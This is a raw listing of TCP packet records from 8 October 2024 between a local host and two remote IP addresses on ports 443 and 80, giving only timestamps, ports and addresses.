Oct 8, 2024 20:47:23.605061054 CEST	443	49779	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.626672983 CEST	443	49777	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.626831055 CEST	443	49777	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.626985073 CEST	49777	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.629899025 CEST	49777	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.629941940 CEST	443	49777	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.629978895 CEST	49777	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.629995108 CEST	443	49777	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.633714914 CEST	49782	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.633750916 CEST	443	49782	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.634102106 CEST	49782	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.634299040 CEST	49782	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.634315014 CEST	443	49782	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.651463032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.651488066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.651500940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.651551962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.651613951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.651626110 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.651628017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.651674986 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.651918888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.651968956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.651981115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.651994944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.652054071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.652066946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.652103901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.652103901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.652775049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.653013945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.653052092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.653105974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.699219942 CEST	443	49780	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.699911118 CEST	49780	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.699955940 CEST	443	49780	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.700555086 CEST	49780	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.700567007 CEST	443	49780	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.715125084 CEST	443	49779	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.715130091 CEST	443	49778	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.715181112 CEST	443	49778	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.715246916 CEST	443	49779	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.715354919 CEST	49778	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.715418100 CEST	49779	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.715477943 CEST	49778	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.715477943 CEST	49778	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.715493917 CEST	49779	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.715513945 CEST	443	49779	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.715523958 CEST	443	49778	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.715533972 CEST	49779	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.715540886 CEST	443	49779	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.715550900 CEST	443	49778	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.719171047 CEST	49783	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.719214916 CEST	443	49783	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.719254017 CEST	49784	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.719295025 CEST	443	49784	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.719300985 CEST	49783	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.719373941 CEST	49784	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.719536066 CEST	49784	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.719552994 CEST	443	49784	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.719562054 CEST	49783	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.719579935 CEST	443	49783	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.779834986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.780047894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.780080080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.780097961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.780128956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.780133963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.780165911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.780168056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.780196905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.780226946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.780272961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.780330896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.780337095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.780369997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.780406952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.780440092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.780474901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.780507088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.780536890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.780569077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.781546116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.781578064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.781606913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.781611919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.781632900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.781644106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.781663895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.781680107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.781696081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.781738043 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.782111883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.782164097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.782171011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.782197952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.782217026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.782237053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.782253027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.782270908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.782286882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.782325029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.782922983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.782987118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.782995939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.783029079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.783049107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.783070087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.783087969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.783103943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.783123970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.783164024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.783771038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.783829927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.786344051 CEST	443	49781	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.786911011 CEST	49781	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.786932945 CEST	443	49781	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.787537098 CEST	49781	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.787542105 CEST	443	49781	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.797777891 CEST	443	49780	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.797914028 CEST	443	49780	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.798086882 CEST	49780	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.798166037 CEST	49780	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.798166037 CEST	49780	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.798209906 CEST	443	49780	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.798238993 CEST	443	49780	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.801434994 CEST	49785	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.801521063 CEST	443	49785	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.801615000 CEST	49785	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.801825047 CEST	49785	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.801852942 CEST	443	49785	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.886605978 CEST	443	49781	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.886667013 CEST	443	49781	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.886797905 CEST	49781	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.887090921 CEST	49781	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.887106895 CEST	443	49781	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.887124062 CEST	49781	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.887129068 CEST	443	49781	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.890794992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.890836954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.890893936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.890928030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.890928984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.890961885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.890989065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.891011953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.891012907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.891047955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.891081095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.891102076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.891113043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.891144991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.891153097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.891181946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.891207933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.891515017 CEST	49786	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.891558886 CEST	443	49786	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.891804934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.891808033 CEST	49786	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.891860008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.891874075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.891896009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.891905069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.891943932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.891966105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.892000914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.892016888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.892035007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.892045975 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.892067909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.892079115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.892111063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.892133951 CEST	49786	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:23.892154932 CEST	443	49786	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:23.892726898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.892782927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.892786980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.892819881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.892833948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.892853022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.892863035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.892905951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.893229961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.893285990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.893285990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.893318892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.893332005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.893357038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.893363953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.893388987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.893402100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.893420935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.893450975 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.893455029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.893479109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.893501997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.894130945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.894186020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.894193888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.894221067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.894229889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.894267082 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.894287109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.894319057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.894351959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.894370079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.894387007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.894411087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.894444942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.895052910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.895107031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.895109892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.895140886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.895155907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.895185947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.895231962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.895262957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.895282030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.895298004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.895315886 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.895333052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.895347118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.895387888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.895956039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.896012068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.896023989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.896056890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.896079063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.896110058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.896111012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.896145105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.896162033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.896181107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.896198988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.896212101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:23.896229982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:23.896256924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002304077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002376080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002413988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002448082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002481937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002481937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002517939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002531052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002552986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002554893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002588034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002592087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002618074 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002625942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002639055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002660990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002677917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002697945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002715111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002732038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002747059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002767086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002784014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002801895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002829075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002835035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002854109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002868891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002885103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002902985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.002918005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.002955914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003088951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003123045 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003144026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003160000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003171921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003190994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003220081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003242016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003243923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003278017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003297091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003312111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003328085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003348112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003360987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003397942 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003475904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003530025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003531933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003565073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003586054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003599882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003616095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003633022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003662109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003667116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003684044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003700018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003719091 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003734112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003750086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003767967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003784895 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003818035 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003834963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003886938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003916979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003950119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.003973007 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.003998995 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004048109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004081011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004101038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004115105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004129887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004148006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004163980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004184961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004210949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004235029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004271030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004303932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004331112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004337072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004353046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004371881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004386902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004407883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004421949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004465103 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.004700899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004755020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004790068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.004817009 CEST	49755	80	192.168.2.5	95.164.90.97
